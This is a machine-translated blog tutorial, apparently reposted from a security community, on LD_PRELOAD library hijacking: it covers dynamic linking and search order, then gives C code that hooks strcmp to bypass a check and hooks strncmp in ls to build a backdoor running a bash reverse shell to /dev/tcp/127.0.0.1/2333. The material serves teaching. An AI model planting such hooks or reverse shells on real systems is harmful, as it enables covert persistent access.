当前位置:网站首页>In depth analysis of LD_ PRELOAD
In depth analysis of LD_ PRELOAD
2022-07-16 04:33:00 【Ruo_ Xiao】
One 、 Pre knowledge
LD_PRELOAD yes Linux/Unix An environment variable of the system , It affects the runtime links of the program (Runtime linker), It allows you to define dynamic link libraries that are loaded first before the program runs . This function is mainly used to selectively load the same function in different dynamic link libraries . Through this environment variable , We can load the dynamic link library and other libraries in the middle , Even covering normal function libraries .
1、 Links to programs
Program links can be divided into the following three types
- Static links : Before the program runs, each object module and the required library functions are linked into a complete executable program , Then don't open it .
- load-time dynamic linking : A group of object modules obtained after compiling the source program , When loading memory , Link while loading .
- Runtime dynamic links : The target module obtained after compiling the original program , In the process of program execution, it needs to be used before it is linked .
Static link library , stay Linux The suffix of the following file name is .a, Such as libstdc++.a . Add the object code directly to the executable program when compiling the link .
Dynamic link library , stay Linux Next is .so file , When compiling the link, you only need to record the number of the link , Only when the program is running will the real “ link ”, So called “ Dynamic links ”. If there are multiple services using the same DLL on the same machine , Then you only need to load one copy to share in memory . therefore , Dynamic link library is also called shared library Or shared objects .
Linux Specify the dynamic link library File name rules Such as the following :
libname.so.x.y.z
lib: Uniform prefix .so: Uniform suffix .name: Library name , Such as libstdc++.so.6.0.21 Of name Namely stdc++.x: The major version number . Indicates that the library has been significantly upgraded , Libraries with different major version numbers are Are not compatible Of . Such as libstdc++.so.6.0.21 The major version number of is 6.y: Sub version number . Represents the incremental upgrade of the Library , Such as adding some new interfaces . When the major version number is the same , High minor version numbers are backward compatible with low minor version numbers . Such as libstdc++.so.6.0.21 The minor version number of is 0 .z: Release No . Represents the optimization of the Library 、bugfix etc. . The same major and minor version numbers , Between libraries with different release version numbers Fully compatible with . Such as libstdc++.so.6.0.21 The release version number of is 21.
Dynamic link library Search path search sequence
- The dynamic library search path specified when compiling the object code ( Multiple search paths can be specified , Search in order );
- environment variable
LD_LIBRARY_PATHSpecified dynamic library search path ( Multiple search paths can be specified , Search in order ); - The configuration file
/etc/ld.so.confThe dynamic library search path specified in ( Multiple search paths can be specified , Search in order ); - Default dynamic library search path
/lib; - Default dynamic library search path
/usr/lib;
But it can be found that , Here we will use the environment variables LD_PRELOAD It doesn't appear in the search path here , Instead, a LD_LIBRARY_PATH, The relationship and difference between the two are stackoverflow There are also big guys discussing , There are many views , But here I agree with the following view
LD_PRELOAD (notLD_PRELOAD_PATH) Is a specific library to load before any other library ( files ) A list of , Whether or not the program requires .LD_LIBRARY_PATHIs to search when loading a library that will be loaded anyway Directory listing . stay linux On , You can readman ld.soMore information about these and other environment variables that affect dynamic linkers .
so , here LD_PRELOAD Even beyond the search path sequence of dynamic link library , It can specify the dynamic link library that is loaded first before the program runs
Two 、 utilize
In my understanding ,LD_PRELOAD In fact, it is also a kind of code injection , The way of knowledge injection and universal Web The way of end injection is different .
1、demo
We rewrite the functions called during the program running and compile them into dynamic link library files , Then we control the environment variables to make the program load the malicious dynamic link library first , And then realize the malicious function we wrote in the dynamic link library .
The specific operation steps are as follows :
- Define a function , Name of function 、 Variables and variable types 、 The return value and return value type should be completely consistent with the function to be replaced . This requires us to look through the corresponding manuals before writing the dynamic link library .
- Will write c The file is compiled as a dynamic link library .
- Yes LD_PRELOAD And retrograde setting , The value is the library file path , Next, you can hijack the original function of the objective function
- End the attack , Use command unset LD_PRELOAD that will do
This attack method can be used in any language , We use one here C Linguistic demo Let's test .
whoami.c
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
char name[] = "mon";
if (argc < 2) {
printf("usage: %s <given-name>\n", argv[0]);
return 0;
}
if (!strcmp(name, argv[1])) {
printf("\033[0;32;32mYour name Correct!\n\033[m");
return 1;
} else {
printf("\033[0;32;31mYour name Wrong!\n\033[m");
return 0;
}
}Let's write a dynamic link library , The objective function is determined here strcmp function
#include <stdlib.h>
#include <string.h>
int strcmp(const char *s1, const char *s2) {
if (getenv("LD_PRELOAD") == NULL) {
return 0;
}
unsetenv("LD_PRELOAD");
return 0;
} Because we passed LD_PRELOAD Hijacked the function , After hijacking, a new process was started , If you don't cancel before the new process starts LD_PRELOAD, Will fall into an infinite loop , So you have to delete the environment variable LD_PRELOAD, The most direct is to call unsetenv("LD_PRELOAD").
If you enter anything successfully, you will be prompted correctly
At this time, we have hijacked strcmp function .
2、 Make the back door
In the operating system , The commands under the command line are actually driven by a series of dynamic link libraries , stay linux We can use readelf -Ws Order to see , At the same time, the path of system command storage is /uer/bin
Since they all use dynamic link libraries , Then suppose we use LD_PRELOAD Replace the dynamic link library that the system command will call , Then can we use the system command to call the dynamic link library to realize what we wrote in LD_PRELOAD The execution of malicious code in the malicious dynamic link library in ?
This is the principle of making the back door , Here we use ls As an example
Let's choose a link library that is easy to operate , Select to [email protected]_2.2.5
So our ls At the same time, by calling system Called id command
hook_strncmp.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void payload() {
system("id");
}
int strncmp(const char *__s1, const char *__s2, size_t __n) { // Here, the definition of the function can be determined according to the error information
if (getenv("LD_PRELOAD") == NULL) {
return 0;
}
unsetenv("LD_PRELOAD");
payload();
}Now that you have called id, Then we can use the execution command here to bounce a shell
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void payload() {
system("bash -c 'bash -i >& /dev/tcp/127.0.0.1/2333 0>&1'");
}
int strncmp(const char *__s1, const char *__s2, size_t __n) { // Here, the definition of the function can be determined according to the error information
if (getenv("LD_PRELOAD") == NULL) {
return 0;
}
unsetenv("LD_PRELOAD");
payload();
}
Successful rebound shell .
Reprint : Qianxin attack and Defense Community - In depth analysis LD_PRELOAD
(SAW:Game Over!)
边栏推荐
- CarSim仿真快速入门(十)—制动系统建模
- ASP. Net core usage record 2
- Wechat applet 1- applet foundation, development tool installation and use
- R language writes user-defined functions (line color, linetype, fill color, label, font, axis label, etc.) to set the beautiful radar chart (radar chart, spider plot) generated by fmsb package, and vi
- PreScan快速入门到精通第十四讲之PreScan中的交通元素
- uni-app 进阶之自定义
- Devops in software development
- The ideal L9 is equipped with flagship safety configuration, which makes the whole family travel safer and more convenient
- XML入门介绍
- Codeforces Round #805 (Div. 3) - E, F, G
猜你喜欢
从零实现一个日志框架
"Double first-class" xiong'an campus of China University of Geosciences (Beijing), put into use in 2025
Anr learning
胶带的模切工艺解析
【北京林业大学】考研初试复试资料分享
C language custom type chapter - custom type: structure, enumeration, union
Use of listview and recyclerview
PreScan快速入门到精通第十五讲之道路元素
微信小程序4-小程序的api
Fumin County Science and Technology Association actively carries out emergency science popularization of safe edible wild fungi
随机推荐
R language ggplot2 visually removes the gray rectangle around the legend
Browser executes JS process
ANR的学习
新一代云原生消息队列 (二)
[paper notes] implementation of autonomous grasping of meal delivery robot based on ROS
微信小程序1-小程序基础,开发工具安装使用
AVL树
非常實用的SQL 優化方案
【日常训练】735. 行星碰撞
深入浏览器的渲染原理
The color emission point of JS event occurs
Introduction of FPC hole adding back glue flat knife die cutting process
[200 opencv routines] 228 Extendlbp improved operator of feature description
PreScan快速入门到精通第十五讲之道路元素
【论文笔记】基于深度强化学习的密集物体温度优先推抓方法
互联网对内核模块的加载之道
人均年薪70万!华为项目经理具备了哪些能力?
进制转换
Detailed explanation and precautions of JDBC
Wechat applet 4 - applet API